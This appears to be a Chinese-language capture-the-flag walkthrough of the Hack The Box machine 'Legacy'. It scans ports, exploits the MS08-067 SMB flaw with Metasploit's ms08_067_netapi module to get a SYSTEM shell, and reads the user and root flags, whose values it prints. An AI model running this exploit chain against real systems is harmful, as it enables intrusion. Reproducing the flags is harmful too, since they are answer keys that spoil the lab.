目录
连接至HTB服务器并启动靶机
1.How many TCP ports are open on Legacy?
2.What is the 2008 CVE ID for a vulnerability in SMB that allows for remote code execution?
3.What is the name of the Metasploit module that exploits CVE-2008-4250?
4.When exploiting MS08-067, what user does execution run as? Include the information before and after the.
5.Submit the flag located on the john user's desktop.
USER_FLAG:e69af0e4f443de7e36876fda4ec7644f
6.Submit the flag located on the administrator's desktop.
ROOT_FLAG:993442d258b0e0ec917cae9e695d5713
7.In addition to MS08-067, Legacy's SMB service is also vulnerable to another remote code execution vulnerability with a CVE ID from 2017. What is that ID?
连接至HTB服务器并启动靶机
靶机IP:10.10.10.4
分配IP:10.10.16.7
1.How many TCP ports are open on Legacy?
使用fscan对靶机进行端口扫描:
fscan -nopoc -nobr -no -h {TARGET_IP}
由fscan扫描结果可见,靶机开放端口:135、139、445 共3个端口
2.What is the 2008 CVE ID for a vulnerability in SMB that allows for remote code execution?
根据Google搜索可知:CVE-2008-4250(MS08-067)
注:其实这一题的答案在下一道题的题目上就有
3.What is the name of the Metasploit module that exploits CVE-2008-4250?
启动metasploit:
msfconsole
对CVE-2008-4250漏洞模块进行搜索:
search cve:CVE-2008-4250
所以利用该漏洞的模块名为:ms08_067_netapi
4.When exploiting MS08-067, what user does execution run as? Include the information before and after the.
使用该模块:
use exploit/windows/smb/ms08_067_netapi
设置靶机IP:
set rhosts {TARGET_IP}
设置分配IP:
set lhost {NATIVE_IP}
漏洞利用:
exploit
查看当前用户名:
getuid
当前登录服务器的用户名为:NT AUTHORITY\SYSTEM
5.Submit the flag located on the john user's desktop.
启动cmd:
shell
进入john用户的桌面:
cd C:\Documents and Settings\john\Desktop
查看user.txt文件内容:
type user.txt
USER_FLAG:e69af0e4f443de7e36876fda4ec7644f
6.Submit the flag located on the administrator's desktop.
进入Administrator用户的桌面:
cd C:\Documents and Settings\Administrator\Desktop
查看root.txt文件内容:
type root.txt
ROOT_FLAG:993442d258b0e0ec917cae9e695d5713
7.In addition to MS08-067, Legacy's SMB service is also vulnerable to another remote code execution vulnerability with a CVE ID from 2017. What is that ID?
这里说的是MS17-010漏洞,直接上百度或者谷歌查一下它的CVE编号即可:
MS17-010远程溢出漏洞- 永恒之蓝:CVE-2017-0143